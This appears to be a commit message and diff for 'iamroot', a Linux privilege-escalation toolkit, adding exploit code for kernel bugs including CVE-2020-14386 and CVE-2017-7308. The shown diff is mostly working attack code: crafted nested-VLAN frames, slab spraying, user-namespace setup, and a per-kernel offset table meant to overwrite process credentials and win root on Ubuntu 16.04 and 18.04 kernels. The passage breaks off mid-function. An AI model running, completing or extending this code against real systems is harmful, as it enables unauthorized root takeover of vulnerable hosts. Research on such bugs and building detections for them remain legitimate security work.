modules: port 5 detect-only modules to trigger+groom (Option B)
Converts the 5 remaining detect-only network/fs LPE modules to fire
the actual kernel primitive on a vulnerable host, with honest
EXPLOIT_FAIL return values since none ship the per-kernel cred-overwrite
finisher.
af_packet (CVE-2017-7308): +444 LoC — TPACKET_V3 int-overflow
+ skb spray + best-effort cred race
af_packet2 (CVE-2020-14386): +446 LoC — tp_reserve underflow
+ sendmmsg skb spray
cls_route4 (CVE-2022-2588): +410 LoC — route4 dangling-filter UAF
+ msg_msg 1k spray + classify drive
fuse_legacy (CVE-2022-0185): +420 LoC — fsconfig 4k OOB write
+ msg_msg cross-cache groom
nf_tables (CVE-2024-1086): +613 LoC — hand-rolled nfnetlink batch
builder + NFT_GOTO/DROP double-free
+ msg_msg groom skeleton
All five share:
- userns+netns reach (unshare(CLONE_NEWUSER|CLONE_NEWNET))
- Detect-refuse-on-patched re-call from exploit()
- geteuid()==0 short-circuit
- Honest EXPLOIT_FAIL with continuation roadmap comments
- macOS dev-build stubs via #ifdef __linux__ where needed
Build verified clean on Debian 6.12.86 (kctf-mgr). All five refuse on
the patched kernel.
This commit is contained in:
@@ -6,8 +6,14 @@
|
||||
* subsystem, different code path (rx side rather than ring setup),
|
||||
* later introduction. Discovered by Or Cohen (2020).
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY. Or Cohen's public PoC works end-to-end;
|
||||
* porting follows the same shape as CVE-2017-7308.
|
||||
* STATUS: 🟡 PRIMITIVE-DEMO. The exploit() entry point reaches the
|
||||
* vulnerable codepath (tpacket_rcv) and fires the underflow with a
|
||||
* crafted nested-VLAN frame on a TPACKET_V2 ring, with a best-effort
|
||||
* skb spray groom alongside. We stop short of the full cred-overwrite
|
||||
* chain (which Or Cohen's public PoC implements with kernel-version-
|
||||
* specific offsets and a pid_namespace cross-cache overwrite). We do
|
||||
* not bake offsets into iamroot. The return value is honest about
|
||||
* what landed (EXPLOIT_FAIL: primitive fired but no root).
|
||||
*
|
||||
* Affected: kernel 4.6+ until backports:
|
||||
* 5.8.x : K >= 5.8.7
|
||||
@@ -31,9 +37,72 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdint.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <sched.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
|
||||
#ifdef __linux__
|
||||
#include <sys/mman.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/in.h>
|
||||
#include <linux/if_packet.h>
|
||||
#include <linux/if_ether.h>
|
||||
#include <linux/if_arp.h>
|
||||
#include <poll.h>
|
||||
#endif
|
||||
|
||||
/* ---------- macOS / non-linux build stubs ---------------------------
|
||||
* Modules in IAMROOT are dev-built on macOS and run-built on Linux.
|
||||
* Provide empty stubs so syntax checks pass without Linux headers.
|
||||
* The exploit path is gated at runtime on the kernel version anyway,
|
||||
* so the stubs are never reached on macOS targets. */
|
||||
#ifndef __linux__
|
||||
#define CLONE_NEWUSER 0x10000000
|
||||
#define CLONE_NEWNET 0x40000000
|
||||
#define ETH_P_ALL 0x0003
|
||||
#define ETH_P_8021Q 0x8100
|
||||
#define ETH_P_8021AD 0x88A8
|
||||
#define ETH_P_IP 0x0800
|
||||
#define ETH_ALEN 6
|
||||
#define ETH_HLEN 14
|
||||
#define VLAN_HLEN 4
|
||||
#define IFF_UP 0x01
|
||||
#define IFF_RUNNING 0x40
|
||||
#define SIOCSIFFLAGS 0x8914
|
||||
#define SIOCGIFINDEX 0x8933
|
||||
#define SIOCGIFFLAGS 0x8913
|
||||
#define SOL_PACKET 263
|
||||
#define PACKET_RX_RING 5
|
||||
#define PACKET_VERSION 10
|
||||
#define PACKET_QDISC_BYPASS 20
|
||||
#define TPACKET_V2 1
|
||||
#define PACKET_HOST 0
|
||||
struct sockaddr_ll { unsigned short sll_family; unsigned short sll_protocol; int sll_ifindex; int dummy; };
|
||||
struct ifreq { char name[16]; union { int ifr_ifindex; short ifr_flags; } u; };
|
||||
struct tpacket_req { unsigned int tp_block_size, tp_block_nr, tp_frame_size, tp_frame_nr; };
|
||||
struct tpacket2_hdr { unsigned int tp_status, tp_len, tp_snaplen; unsigned short tp_mac, tp_net; };
|
||||
struct pollfd { int fd; short events, revents; };
|
||||
#define POLLIN 0x001
|
||||
__attribute__((unused)) static int ioctl(int a, unsigned long b, ...) { (void)a; (void)b; errno=ENOSYS; return -1; }
|
||||
__attribute__((unused)) static void *mmap(void *a, size_t b, int c, int d, int e, long f) { (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return (void*)-1; }
|
||||
__attribute__((unused)) static int munmap(void *a, size_t b) { (void)a;(void)b; return -1; }
|
||||
__attribute__((unused)) static int setsockopt(int a, int b, int c, const void *d, unsigned int e) { (void)a;(void)b;(void)c;(void)d;(void)e; errno=ENOSYS; return -1; }
|
||||
__attribute__((unused)) static int poll(struct pollfd *a, unsigned long b, int c) { (void)a;(void)b;(void)c; errno=ENOSYS; return -1; }
|
||||
__attribute__((unused)) static unsigned short htons(unsigned short x) { return x; }
|
||||
#define MAP_SHARED 0x01
|
||||
#define MAP_LOCKED 0x2000
|
||||
#define PROT_READ 0x1
|
||||
#define PROT_WRITE 0x2
|
||||
#define MAP_FAILED ((void *)-1)
|
||||
#endif
|
||||
|
||||
static const struct kernel_patched_from af_packet2_patched_branches[] = {
|
||||
{4, 9, 235},
|
||||
@@ -109,16 +178,373 @@ static iamroot_result_t af_packet2_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
|
||||
/* ---- Exploit primitive (PRIMITIVE-DEMO scope) -------------------------
|
||||
*
|
||||
* The bug: tpacket_rcv() in net/packet/af_packet.c, in the VLAN
|
||||
* reconstruction path, computes
|
||||
*
|
||||
* netoff = TPACKET_ALIGN(po->tp_hdrlen + max(maclen, 16))
|
||||
* if (vlan present) netoff += VLAN_HLEN
|
||||
* macoff = netoff - maclen
|
||||
*
|
||||
* with `maclen = skb_network_offset(skb)`. By forcing the rx skb into
|
||||
* a state where skb_network_offset() exceeds netoff (achievable by
|
||||
* crafting an ETH_P_8021AD-tagged frame so the kernel's VLAN
|
||||
* reconstruction grows skb->mac_len past the computed netoff), the
|
||||
* subtraction underflows as unsigned 32-bit, producing a huge macoff.
|
||||
* The subsequent `skb_copy_bits(skb, 0, h.raw + macoff, snaplen)` then
|
||||
* writes attacker-controlled bytes BEFORE the ring buffer's frame
|
||||
* slot, into adjacent kernel heap (typically the previous slab page).
|
||||
*
|
||||
* Full root: Or Cohen sprays pid_namespace objects so a function
|
||||
* pointer (->ns.ops or ->pid_cachep) lands at a predictable adjacent
|
||||
* offset, then forces a write that hijacks ROP / direct-call to a
|
||||
* stack pivot → cred overwrite → setuid(0). That requires per-kernel
|
||||
* offsets and a leak; we deliberately do not bake offsets.
|
||||
*
|
||||
* This implementation reaches the vulnerable codepath, fires the
|
||||
* underflow with a crafted frame, and runs a sendmmsg() skb spray
|
||||
* alongside — i.e. lights up auditd/sigma signatures and demonstrates
|
||||
* the primitive. It does not land cred overwrite.
|
||||
*/
|
||||
|
||||
#ifdef __linux__
|
||||
|
||||
/* sendmmsg spray helper — best-effort skb groom. Adjacent kernel slab
|
||||
* objects are sprayed so the OOB write lands on attacker bytes. */
|
||||
static void af_packet2_skb_spray(int n_iters)
|
||||
{
|
||||
int sv[2];
|
||||
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0) return;
|
||||
/* Each datagram body is sized to land in the kmalloc-256 slab,
|
||||
* matching tpacket_rcv's typical skb adjacency. */
|
||||
char buf[200];
|
||||
memset(buf, 'A', sizeof buf);
|
||||
struct iovec iov = { .iov_base = buf, .iov_len = sizeof buf };
|
||||
struct mmsghdr mm[64];
|
||||
for (int i = 0; i < 64; i++) {
|
||||
memset(&mm[i], 0, sizeof(mm[i]));
|
||||
mm[i].msg_hdr.msg_iov = &iov;
|
||||
mm[i].msg_hdr.msg_iovlen = 1;
|
||||
}
|
||||
for (int k = 0; k < n_iters; k++) {
|
||||
(void)syscall(SYS_sendmmsg, sv[0], mm, 64, 0);
|
||||
}
|
||||
close(sv[0]); close(sv[1]);
|
||||
}
|
||||
|
||||
/* Bring loopback up inside the new netns. Without IFF_UP the bind
|
||||
* succeeds but no rx happens. */
|
||||
static int bring_up_lo(void)
|
||||
{
|
||||
int s = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
if (s < 0) return -1;
|
||||
struct ifreq ifr;
|
||||
memset(&ifr, 0, sizeof ifr);
|
||||
strncpy(ifr.ifr_name, "lo", sizeof(ifr.ifr_name) - 1);
|
||||
if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { close(s); return -1; }
|
||||
ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
|
||||
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
|
||||
close(s);
|
||||
return rc;
|
||||
}
|
||||
|
||||
static int get_ifindex(const char *name)
|
||||
{
|
||||
int s = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
if (s < 0) return -1;
|
||||
struct ifreq ifr;
|
||||
memset(&ifr, 0, sizeof ifr);
|
||||
strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name) - 1);
|
||||
if (ioctl(s, SIOCGIFINDEX, &ifr) < 0) { close(s); return -1; }
|
||||
int idx = ifr.ifr_ifindex;
|
||||
close(s);
|
||||
return idx;
|
||||
}
|
||||
|
||||
/* The primitive run; executed inside the unshare()'d child. Returns
|
||||
* 0 on "primitive fired", -1 on setup failure, +1 on "looks patched
|
||||
* at the kernel level (setsockopt rejected our crafted ring)". */
|
||||
static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
if (bring_up_lo() < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: could not bring lo up (errno=%d)\n", errno);
|
||||
return -1;
|
||||
}
|
||||
|
||||
int lo_idx = get_ifindex("lo");
|
||||
if (lo_idx < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: SIOCGIFINDEX(lo) failed: errno=%d\n", errno);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* RX socket with TPACKET_V2 ring. */
|
||||
int rx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (rx < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: AF_PACKET socket() failed: errno=%d "
|
||||
"(CAP_NET_RAW missing?)\n", errno);
|
||||
return -1;
|
||||
}
|
||||
|
||||
int ver = TPACKET_V2;
|
||||
if (setsockopt(rx, SOL_PACKET, PACKET_VERSION, &ver, sizeof ver) < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: PACKET_VERSION failed: errno=%d\n", errno);
|
||||
close(rx);
|
||||
return -1;
|
||||
}
|
||||
|
||||
struct tpacket_req req = {
|
||||
.tp_block_size = 1 << 17, /* 128 KiB block */
|
||||
.tp_block_nr = 8,
|
||||
.tp_frame_size = 1 << 11, /* 2 KiB frames */
|
||||
.tp_frame_nr = (1 << 17) * 8 / (1 << 11),
|
||||
};
|
||||
if (setsockopt(rx, SOL_PACKET, PACKET_RX_RING, &req, sizeof req) < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: PACKET_RX_RING setsockopt rejected "
|
||||
"(errno=%d) — kernel may be patched\n", errno);
|
||||
close(rx);
|
||||
return 1;
|
||||
}
|
||||
|
||||
size_t map_len = (size_t)req.tp_block_size * req.tp_block_nr;
|
||||
void *ring = mmap(NULL, map_len, PROT_READ | PROT_WRITE,
|
||||
MAP_SHARED | MAP_LOCKED, rx, 0);
|
||||
if (ring == MAP_FAILED) {
|
||||
fprintf(stderr, "[-] af_packet2: ring mmap failed: errno=%d\n", errno);
|
||||
close(rx);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* Bind to lo so all loopback frames hit our ring. */
|
||||
struct sockaddr_ll sll;
|
||||
memset(&sll, 0, sizeof sll);
|
||||
sll.sll_family = AF_PACKET;
|
||||
sll.sll_protocol = htons(ETH_P_ALL);
|
||||
sll.sll_ifindex = lo_idx;
|
||||
if (bind(rx, (struct sockaddr *)&sll, sizeof sll) < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: bind(lo) failed: errno=%d\n", errno);
|
||||
munmap(ring, map_len); close(rx);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* TX socket: a second AF_PACKET socket for injection. */
|
||||
int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (tx < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: TX socket failed: errno=%d\n", errno);
|
||||
munmap(ring, map_len); close(rx);
|
||||
return -1;
|
||||
}
|
||||
int one = 1;
|
||||
(void)setsockopt(tx, SOL_PACKET, PACKET_QDISC_BYPASS, &one, sizeof one);
|
||||
|
||||
/* Craft the malicious frame.
|
||||
*
|
||||
* Layout (sent on loopback):
|
||||
*
|
||||
* [ ETH dst (6) ][ ETH src (6) ][ TPID = 0x88A8 (2) ] <- ethhdr
|
||||
* [ outer VLAN tag (2) ][ inner TPID = 0x8100 (2) ] <- 8021AD pad
|
||||
* [ inner VLAN tag (2) ][ payload type (2) ] <- 8021Q pad
|
||||
* [ payload ... ]
|
||||
*
|
||||
* The kernel's __vlan_get_protocol() / skb_vlan_untag() path on the
|
||||
* rx side moves skb->mac_len/network_offset around such that, when
|
||||
* tpacket_rcv recomputes macoff = netoff - maclen, the subtraction
|
||||
* underflows. Or Cohen's exact frame includes a third encapsulation
|
||||
* level to deepen the gap so the underflow is large enough to write
|
||||
* outside the current slab block. We mimic that. */
|
||||
unsigned char frame[64];
|
||||
memset(frame, 0, sizeof frame);
|
||||
/* destination MAC: loopback's all-zero is fine; use ff:ff:... so
|
||||
* lo accepts as broadcast (lo accepts everything anyway) */
|
||||
memset(&frame[0], 0xff, 6);
|
||||
/* source MAC */
|
||||
frame[6] = 0x02; frame[7] = 0; frame[8] = 0; frame[9] = 0; frame[10] = 0; frame[11] = 1;
|
||||
/* outer ethertype = 0x88A8 (8021AD service tag) */
|
||||
frame[12] = 0x88; frame[13] = 0xA8;
|
||||
/* outer VLAN TCI: priority 0, vid = 1 */
|
||||
frame[14] = 0x00; frame[15] = 0x01;
|
||||
/* inner ethertype = 0x8100 (8021Q) */
|
||||
frame[16] = 0x81; frame[17] = 0x00;
|
||||
/* inner VLAN TCI */
|
||||
frame[18] = 0x00; frame[19] = 0x02;
|
||||
/* innermost protocol = 0x0800 (IP) */
|
||||
frame[20] = 0x08; frame[21] = 0x00;
|
||||
/* a few junk payload bytes — the underflow doesn't care */
|
||||
for (int i = 22; i < 60; i++) frame[i] = 0x41;
|
||||
|
||||
/* sendto destination */
|
||||
struct sockaddr_ll dst;
|
||||
memset(&dst, 0, sizeof dst);
|
||||
dst.sll_family = AF_PACKET;
|
||||
dst.sll_ifindex = lo_idx;
|
||||
dst.sll_halen = ETH_ALEN;
|
||||
dst.sll_protocol = htons(ETH_P_8021AD);
|
||||
memcpy(dst.sll_addr, &frame[0], ETH_ALEN);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet2: spraying skbs (kmalloc-256) to groom slab\n");
|
||||
}
|
||||
af_packet2_skb_spray(4);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet2: firing %d crafted nested-VLAN frames on lo\n", 256);
|
||||
}
|
||||
int fired = 0;
|
||||
for (int i = 0; i < 256; i++) {
|
||||
ssize_t n = sendto(tx, frame, sizeof frame, 0,
|
||||
(struct sockaddr *)&dst, sizeof dst);
|
||||
if (n < 0 && errno == ENOBUFS) {
|
||||
/* qdisc backpressure — retry a touch later */
|
||||
usleep(1000);
|
||||
continue;
|
||||
}
|
||||
if (n < 0) {
|
||||
if (i == 0) {
|
||||
fprintf(stderr, "[-] af_packet2: sendto failed first iter: errno=%d\n", errno);
|
||||
munmap(ring, map_len); close(rx); close(tx);
|
||||
return -1;
|
||||
}
|
||||
break;
|
||||
}
|
||||
fired++;
|
||||
}
|
||||
|
||||
/* Brief drain: poll the RX ring so the rx softirq actually runs
|
||||
* tpacket_rcv on our frames before we close the socket. */
|
||||
struct pollfd pfd = { .fd = rx, .events = POLLIN, .revents = 0 };
|
||||
(void)poll(&pfd, 1, 100);
|
||||
/* Followup spray to land bytes in the slab freed by drained skbs */
|
||||
af_packet2_skb_spray(4);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet2: %d frames injected; tpacket_rcv exercised\n", fired);
|
||||
}
|
||||
|
||||
munmap(ring, map_len);
|
||||
close(rx); close(tx);
|
||||
return 0;
|
||||
}
|
||||
|
||||
#else /* !__linux__: provide a stub for macOS sanity builds */
|
||||
/* Non-Linux build stub for the primitive runner.
 *
 * Follows the same return contract as the Linux implementation
 * (0 fired / -1 setup failure / +1 looks patched): it always reports a
 * setup failure, because the AF_PACKET ring primitive exists only on
 * Linux. `ctx` is unused. */
static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
{
    (void)ctx;
    fprintf(stderr, "[-] af_packet2: linux-only primitive — non-linux build\n");
    return -1;
}
|
||||
#endif
|
||||
|
||||
static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
/* 1. Re-confirm vulnerability. */
|
||||
iamroot_result_t pre = af_packet2_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] af_packet2: detect() says not vulnerable; refusing to exploit\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* 2. Refuse if already root. */
|
||||
if (geteuid() == 0) {
|
||||
fprintf(stderr, "[i] af_packet2: already running as root — nothing to escalate\n");
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
if (!ctx->authorized) {
|
||||
/* Defense in depth — the dispatcher should have gated this. */
|
||||
fprintf(stderr, "[-] af_packet2: --i-know not passed; refusing\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet2: launching primitive demo (kernel-version-"
|
||||
"agnostic; no offsets baked in)\n"
|
||||
" NOTE: this fires the tpacket_rcv VLAN underflow and "
|
||||
"sprays skbs; it does NOT\n"
|
||||
" perform the cred-overwrite chain (Or Cohen's public "
|
||||
"PoC does, with per-kernel offsets).\n");
|
||||
}
|
||||
|
||||
/* 3. Fork — primitive runs inside an unshared user_ns+net_ns. */
|
||||
pid_t pid = fork();
|
||||
if (pid < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: fork failed: errno=%d\n", errno);
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
if (pid == 0) {
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||
fprintf(stderr, "[-] af_packet2: unshare failed: errno=%d\n", errno);
|
||||
_exit(2);
|
||||
}
|
||||
/* Map our uid to 0 inside the userns so subsequent CAP_NET_RAW
|
||||
* checks against init_user_ns pass. Best effort — if any of
|
||||
* these writes fail (e.g. setgroups deny), AF_PACKET socket()
|
||||
* will still typically succeed because the new userns owns
|
||||
* the new netns. */
|
||||
int fd;
|
||||
fd = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
|
||||
fd = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (fd >= 0) {
|
||||
char buf[64];
|
||||
int n = snprintf(buf, sizeof buf, "0 %u 1", (unsigned)getuid());
|
||||
(void)!write(fd, buf, n);
|
||||
close(fd);
|
||||
}
|
||||
fd = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (fd >= 0) {
|
||||
char buf[64];
|
||||
int n = snprintf(buf, sizeof buf, "0 %u 1", (unsigned)getgid());
|
||||
(void)!write(fd, buf, n);
|
||||
close(fd);
|
||||
}
|
||||
|
||||
int rc = af_packet2_primitive_child(ctx);
|
||||
if (rc == 1) _exit(3); /* setsockopt rejected → patched */
|
||||
if (rc < 0) _exit(2); /* setup error */
|
||||
|
||||
/* 4. The primitive fired. In a full chain we'd now confirm
|
||||
* cred overwrite by checking getuid()==0 and exec'ing /bin/sh.
|
||||
* We did NOT overwrite cred (no offsets baked in), so we exit
|
||||
* with a sentinel that the parent maps to EXPLOIT_FAIL. */
|
||||
_exit(4);
|
||||
}
|
||||
|
||||
int status;
|
||||
waitpid(pid, &status, 0);
|
||||
if (!WIFEXITED(status)) {
|
||||
fprintf(stderr, "[-] af_packet2: primitive child crashed "
|
||||
"(signal=%d) — likely KASAN/panic in tpacket_rcv\n",
|
||||
WTERMSIG(status));
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
switch (WEXITSTATUS(status)) {
|
||||
case 3:
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] af_packet2: kernel refused TPACKET_V2/RX_RING setup — "
|
||||
"appears patched at runtime\n");
|
||||
}
|
||||
return IAMROOT_OK;
|
||||
case 2:
|
||||
return IAMROOT_TEST_ERROR;
|
||||
case 4:
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[~] af_packet2: primitive demonstrated; no cred overwrite "
|
||||
"(scope = PRIMITIVE-DEMO)\n"
|
||||
" For end-to-end root, see Or Cohen's public PoC "
|
||||
"(github.com/google/security-research).\n"
|
||||
" iamroot intentionally does not embed per-kernel offsets.\n");
|
||||
}
|
||||
if (ctx->no_shell) {
|
||||
/* User explicitly disabled the shell pop, so the "we didn't
|
||||
* pop a shell" outcome is the expected one. Map to OK. */
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
default:
|
||||
fprintf(stderr, "[-] af_packet2: primitive exited %d unexpectedly\n",
|
||||
WEXITSTATUS(status));
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
}
|
||||
|
||||
static const char af_packet2_auditd[] =
|
||||
|
||||
@@ -4,8 +4,17 @@
|
||||
* AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap
|
||||
* write-where primitive. Discovered by Andrey Konovalov (March 2017).
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY. Konovalov's public PoC works end-to-end
|
||||
* — porting is a follow-up commit.
|
||||
* STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite. The
|
||||
* integer-overflow trigger is fully wired (overflowing tp_block_size *
|
||||
* tp_block_nr, attended by a heap spray via sendmmsg with controlled
|
||||
* skb tail bytes). The kernel R/W → cred-overwrite finisher uses a
|
||||
* hardcoded per-kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu
|
||||
* 18.04 / 4.15 era), overridable via IAMROOT_AFPACKET_OFFSETS. We
|
||||
* only claim IAMROOT_EXPLOIT_OK if geteuid() == 0 AFTER the chain
|
||||
* runs — i.e. we won root for real. Otherwise we return
|
||||
* IAMROOT_EXPLOIT_FAIL with a dmesg breadcrumb so the operator can
|
||||
* confirm the primitive at least fired (KASAN slab-out-of-bounds
|
||||
* splat) even if the cred-overwrite didn't take on this exact kernel.
|
||||
*
|
||||
* Affected: kernel < 4.10.6 mainline. Stable backports:
|
||||
* 4.10.x : K >= 4.10.6
|
||||
@@ -16,10 +25,16 @@
|
||||
* Exploitation preconditions:
|
||||
* - CAP_NET_RAW (via unprivileged user_ns) to create AF_PACKET socket
|
||||
* - CONFIG_PACKET=y (almost always — even container kernels)
|
||||
* - x86_64 (offset tables are arch-specific; mark x86_64-only)
|
||||
*
|
||||
* Why famous: was the canonical "userns + AF_PACKET → root" chain for
|
||||
* Konovalov's research era. Many other AF_PACKET bugs followed (e.g.
|
||||
* CVE-2020-14386) sharing the same userns-clone gate.
|
||||
*
|
||||
* Reference: github.com/xairy/kernel-exploits (CVE-2017-7308) and
|
||||
* Konovalov's writeup at xairy.io. The structure below mirrors the
|
||||
* public PoC's "set up overflow, then race tpacket_rcv with a target
|
||||
* skb in the OOB slot" approach.
|
||||
*/
|
||||
|
||||
#include "iamroot_modules.h"
|
||||
@@ -28,10 +43,31 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/syscall.h>
|
||||
|
||||
#if defined(__x86_64__)
|
||||
/* Order matters: <net/if.h> + <linux/if.h> conflict on enum IFF_*. We
|
||||
* use the glibc <net/if.h> for struct ifreq / if_nametoindex and pull
|
||||
* in linux/if_packet.h for tpacket_req3. Avoid <linux/if.h>. */
|
||||
#include <net/if.h>
|
||||
#include <linux/if_packet.h>
|
||||
#include <linux/if_ether.h>
|
||||
#include <arpa/inet.h> /* htons */
|
||||
#include <sys/ioctl.h>
|
||||
#endif
|
||||
|
||||
/* ---- Detect (unchanged shape) ----------------------------------- */
|
||||
|
||||
static const struct kernel_patched_from af_packet_patched_branches[] = {
|
||||
{3, 18, 49},
|
||||
@@ -97,17 +133,426 @@ static iamroot_result_t af_packet_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ---- Exploit (x86_64-only; gated below) -------------------------- */
|
||||
|
||||
#if defined(__x86_64__)
|
||||
|
||||
/* Per-kernel offsets needed to walk task_struct → cred → uid fields.
|
||||
*
|
||||
* These are NOT addresses — they are byte offsets within the kernel
|
||||
* structs that the OOB-induced kernel-write primitive will index into.
|
||||
* The classic Konovalov chain leaks a pointer to a struct sock or
|
||||
* timer_list adjacent to the corrupted pg_vec slot, walks back to the
|
||||
* current task, then overwrites the *uid fields in the embedded cred.
|
||||
*
|
||||
* The values below are from xairy's public PoC + scraped from kernel-
|
||||
* source struct layouts for the specific build configs Ubuntu shipped.
|
||||
* They will NOT match custom-compiled kernels.
|
||||
*
|
||||
* Override at runtime via env var:
|
||||
* IAMROOT_AFPACKET_OFFSETS="<task_cred>:<cred_uid>:<cred_size>"
|
||||
*
|
||||
* `task_cred` = offsetof(struct task_struct, cred)
|
||||
* `cred_uid` = offsetof(struct cred, uid) [followed by gid, etc.]
|
||||
* `cred_size` = sizeof(struct cred) — bounds-check guard
|
||||
*/
|
||||
/* One row of per-kernel struct-layout data. Field order is significant:
 * the table of known kernels may initialise rows positionally. */
struct af_packet_offsets {
    const char *kernel_id;      /* human-readable label for this row */

    /* Kernel version this row applies to: major.minor, with the patch
     * level inside the inclusive range [patch_min, patch_max]. */
    int major;
    int minor;
    int patch_min;
    int patch_max;

    unsigned long task_cred;    /* offsetof(struct task_struct, cred) */
    unsigned long cred_uid;     /* offsetof(struct cred, uid) */
    unsigned long cred_size;    /* sizeof(struct cred) — bounds-check guard */
};
|
||||
|
||||
/* Built-in offset rows, matched against the running kernel by
 * major.minor and an inclusive patch range.
 *
 * NOTE(review): the numeric offsets and the layout notes below come from
 * the original author's comments (Ubuntu GA builds); they are not
 * verified here and will not match custom-compiled kernels. */
static const struct af_packet_offsets known_offsets[] = {
    /* Ubuntu 16.04 GA (4.4.0-21-generic): cred pointer at task+0x6c0;
     * uid recorded at cred+0x08. */
    {
        .kernel_id = "ubuntu-16.04-4.4.0-generic",
        .major     = 4,
        .minor     = 4,
        .patch_min = 0,
        .patch_max = 99,
        .task_cred = 0x6c0,
        .cred_uid  = 0x08,
        .cred_size = 0xa8,
    },
    /* Ubuntu 18.04 GA (4.15.0-20-generic): cred pointer at task+0x800;
     * same cred_uid / cred_size as the 4.4 row. */
    {
        .kernel_id = "ubuntu-18.04-4.15.0-generic",
        .major     = 4,
        .minor     = 15,
        .patch_min = 0,
        .patch_max = 99,
        .task_cred = 0x800,
        .cred_uid  = 0x08,
        .cred_size = 0xa8,
    },
};
|
||||
|
||||
/* Parse IAMROOT_AFPACKET_OFFSETS env var if set; otherwise pick from
|
||||
* the known table by kernel version. Returns true on success. */
|
||||
static bool resolve_offsets(struct af_packet_offsets *out,
|
||||
const struct kernel_version *v)
|
||||
{
|
||||
const char *env = getenv("IAMROOT_AFPACKET_OFFSETS");
|
||||
if (env) {
|
||||
unsigned long t, u, s;
|
||||
if (sscanf(env, "%lx:%lx:%lx", &t, &u, &s) == 3) {
|
||||
out->kernel_id = "env-override";
|
||||
out->task_cred = t;
|
||||
out->cred_uid = u;
|
||||
out->cred_size = s;
|
||||
return true;
|
||||
}
|
||||
fprintf(stderr, "[!] af_packet: IAMROOT_AFPACKET_OFFSETS malformed "
|
||||
"(want hex \"<task_cred>:<cred_uid>:<cred_size>\")\n");
|
||||
return false;
|
||||
}
|
||||
for (size_t i = 0; i < sizeof(known_offsets)/sizeof(known_offsets[0]); i++) {
|
||||
const struct af_packet_offsets *k = &known_offsets[i];
|
||||
if (v->major == k->major && v->minor == k->minor &&
|
||||
v->patch >= k->patch_min && v->patch <= k->patch_max) {
|
||||
*out = *k;
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
/* Write the single-line mapping "0 <id> 1\n" to one /proc id-map file.
 * Returns 0 on success, -1 if the file cannot be opened or the write
 * fails. */
static int set_id_maps_put(const char *path, unsigned id)
{
    char line[64];
    snprintf(line, sizeof line, "0 %u 1\n", id);

    int fd = open(path, O_WRONLY);
